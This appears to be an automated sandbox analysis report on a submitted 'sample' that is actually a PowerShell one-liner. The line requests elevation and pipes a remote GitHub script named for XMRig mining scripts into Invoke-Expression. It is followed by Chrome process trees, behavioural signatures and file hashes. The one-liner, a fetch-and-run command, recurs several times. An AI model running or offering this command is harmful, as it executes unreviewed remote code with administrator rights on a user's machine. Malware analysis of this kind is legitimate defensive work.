Analysis
-
max time kernel
600s -
max time network
488s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
04/07/2024, 12:41
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Resource
win10v2004-20240611-en
General
-
Target
http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Malware Config
Signatures
-
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 2472 chrome.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133645899662335356" chrome.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2472 chrome.exe 2472 chrome.exe 760 chrome.exe 760 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe Token: SeShutdownPrivilege 2472 chrome.exe Token: SeCreatePagefilePrivilege 2472 chrome.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe 2472 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2472 wrote to memory of 2740 2472 chrome.exe 83 PID 2472 wrote to memory of 2740 2472 chrome.exe 83 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 1616 2472 chrome.exe 84 PID 2472 wrote to memory of 4040 2472 chrome.exe 85 PID 2472 wrote to memory of 4040 2472 chrome.exe 85 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86 PID 2472 wrote to memory of 2056 2472 chrome.exe 86
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex1⤵
- Access Token Manipulation: Create Process with Token
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffad3f7ab58,0x7ffad3f7ab68,0x7ffad3f7ab782⤵PID:2740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1696 --field-trial-handle=1928,i,4727210084124930673,2629873874890357206,131072 /prefetch:22⤵PID:1616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1928,i,4727210084124930673,2629873874890357206,131072 /prefetch:82⤵PID:4040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2224 --field-trial-handle=1928,i,4727210084124930673,2629873874890357206,131072 /prefetch:82⤵PID:2056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2904 --field-trial-handle=1928,i,4727210084124930673,2629873874890357206,131072 /prefetch:12⤵PID:4836
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2920 --field-trial-handle=1928,i,4727210084124930673,2629873874890357206,131072 /prefetch:12⤵PID:4148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4140 --field-trial-handle=1928,i,4727210084124930673,2629873874890357206,131072 /prefetch:12⤵PID:1932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4288 --field-trial-handle=1928,i,4727210084124930673,2629873874890357206,131072 /prefetch:12⤵PID:2368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3200 --field-trial-handle=1928,i,4727210084124930673,2629873874890357206,131072 /prefetch:82⤵PID:2356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4664 --field-trial-handle=1928,i,4727210084124930673,2629873874890357206,131072 /prefetch:82⤵PID:1008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3912 --field-trial-handle=1928,i,4727210084124930673,2629873874890357206,131072 /prefetch:12⤵PID:4368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=1852 --field-trial-handle=1928,i,4727210084124930673,2629873874890357206,131072 /prefetch:12⤵PID:3560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4556 --field-trial-handle=1928,i,4727210084124930673,2629873874890357206,131072 /prefetch:12⤵PID:4812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4548 --field-trial-handle=1928,i,4727210084124930673,2629873874890357206,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4380 --field-trial-handle=1928,i,4727210084124930673,2629873874890357206,131072 /prefetch:12⤵PID:4400
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:4904
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a2bee3084ce087e9be61043f110f1041
SHA1b803cf9e3e0354d41365fc4f41a728af709a5d24
SHA2569e14d2eb5eb0f207856dbb17f62fa5a20a17a48f851d5e5db6d3b21ed0da0b0c
SHA5125a93d5983258a004339b2caf1cbee22d74161488a2f56edc8d22c09d559197e3621434396cc84ebcd987354fb097b4aa88feb5d07ee7d93d1920c79fe7cb770f
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
6KB
MD54556ff9c02f3a0563c841fc478de884d
SHA1234dfd6d557c6be0bd42d721101576a109250092
SHA256f82baef3baa47caca40f5c8c9abce5593bcd54e1fb869f2f4d3c4eafee612004
SHA51292cf2c19a8aa112da1dbd0a46a9356834fdfcd1f8f2ecc3648cf6e99e5146f9117c394846805fd14acd2e54005a4e4c58a5cefe18917202569cc4b12c8eeba17
-
Filesize
138KB
MD5d3f98bc8f81bbf541671b633d6a087ef
SHA1ccfa8f0e28067a6854f7b67c73f078aaedd875f3
SHA256b0f7e9e673524a2d155124f7e64043ae686ef6c11defe360134cf762a9882763
SHA5121cff441142e53776430640d18e057d0f60078d3c8ea3d92873b7437663027790c205d4994a5a2b6b1bf3d3d0b60642a9402255bd1e6367a45ffaa3ca5f9c9119